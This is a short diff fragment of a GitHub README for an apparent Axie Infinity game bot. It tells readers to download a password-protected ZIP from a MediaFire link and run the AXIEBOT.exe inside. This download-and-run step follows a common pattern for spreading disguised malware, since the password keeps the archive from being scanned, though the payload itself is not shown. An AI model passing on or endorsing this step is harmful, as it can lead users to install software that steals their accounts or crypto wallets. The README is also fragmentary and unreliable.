MohammadrezaFarahmand/axie-infinity-bot/README.md

 2.Download archive with software https://www.mediafire.com/file/45lsw0mjspoadam/AxieBot.zip/file Password:1488

 3.Launch AXIEBOT.exe with correct settings

-Warning
+Warnin
 Im not recommend you to play more than 24 hours per account.
 Im not take responsibility for any bans or blocks.

 Copyright